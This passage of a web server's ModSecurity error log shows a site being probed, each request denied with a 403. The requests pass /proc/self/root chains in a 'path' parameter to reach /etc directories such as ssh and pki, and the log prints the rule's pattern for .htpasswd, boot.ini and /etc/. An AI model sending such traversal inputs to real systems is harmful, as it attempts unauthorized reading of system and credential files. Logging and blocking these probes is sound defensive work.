"abqtQuoXxyEfFpUF8f9uDAAAAUI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:48:52.984899 2026] [:error] [pid 11816:tid 140411607643904] [client 74.7.243.128:34240] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqtROw_le52K8_3pV3gawAAAhA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:48:54.309878 2026] [:error] [pid 15051:tid 140411540502272] [client 74.7.243.128:34252] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqtRimAPhZkrhU8w4ltFgAAAJg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:48:55.687090 2026] [:error] [pid 30077:tid 140411683178240] [client 74.7.243.128:34260] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqtR_u8EFLIOrSqIpsEZwAAAkc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:49:03.101499 2026] [:error] [pid 15051:tid 140411699963648] [client 74.7.243.128:34262] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqtTymAPhZkrhU8w4ltMwAAAIU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:49:04.555311 2026] [:error] [pid 15826:tid 140411674785536] [client 74.7.243.128:46512] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqtUOoXxyEfFpUF8f9uIQAAAUg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:49:06.449579 2026] [:error] [pid 19507:tid 140411725141760] [client 74.7.243.128:46516] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqtUtY0UrI5A3LftIypOQAAAYI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:49:08.542961 2026] [:error] [pid 19507:tid 140411616036608] [client 74.7.243.128:46524] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqtVNY0UrI5A3LftIypPAAAAY8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:49:09.906137 2026] [:error] [pid 31803:tid 140411599251200] [client 74.7.243.128:47992] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqtVeyqAr6etmhZHNrBFgAAAFE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:49:11.251064 2026] [:error] [pid 17887:tid 140411590858496] [client 74.7.243.128:48008] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqtVwkwaGbbGflqUZAROwAAANI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:49:12.649667 2026] [:error] [pid 26799:tid 140411674785536] [client 74.7.243.128:48018] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqtWNa6ubjKNq_cu4aa3gAAA0g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:49:15.032093 2026] [:error] [pid 15826:tid 140411557287680] [client 74.7.243.128:48022] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqtWuoXxyEfFpUF8f9uPQAAAVY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:49:17.898324 2026] [:error] [pid 15826:tid 140411599251200] [client 74.7.241.31:50832] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqtXeoXxyEfFpUF8f9uQQAAAVE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:49:17.992937 2026] [:error] [pid 31803:tid 140411691570944] [client 74.7.243.128:48024] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqtXeyqAr6etmhZHNrBJgAAAEY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:49:19.443766 2026] [:error] [pid 17887:tid 140411708356352] [client 74.7.243.128:46870] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqtXwkwaGbbGflqUZARRQAAAMQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:49:20.483605 2026] [:error] [pid 26799:tid 140411557287680] [client 74.7.241.31:58762] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqtYNa6ubjKNq_cu4aa9QAAA1Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:49:20.901516 2026] [:error] [pid 17653:tid 140411590858496] [client 74.7.243.128:46876] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqtYMdf6f5d65gmYZTV6QAAAtI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:49:21.435768 2026] [:error] [pid 19507:tid 140411699963648] [client 74.7.243.128:46884] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqtYdY0UrI5A3LftIypTAAAAYU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:49:23.347532 2026] [:error] [pid 19507:tid 140411658000128] [client 74.7.243.128:46898] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqtY9Y0UrI5A3LftIypTwAAAYo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:49:26.200222 2026] [:error] [pid 19507:tid 140411741927168] [client 74.7.243.128:46906] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqtZdY0UrI5A3LftIypUwAAAYA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:49:27.967429 2026] [:error] [pid 31803:tid 140411548894976] [client 74.7.243.128:46916] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqtZ-yqAr6etmhZHNrBMwAAAFc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:49:29.505770 2026] [:error] [pid 31803:tid 140411607643904] [client 74.7.243.128:55574] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqtaeyqAr6etmhZHNrBNQAAAFA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
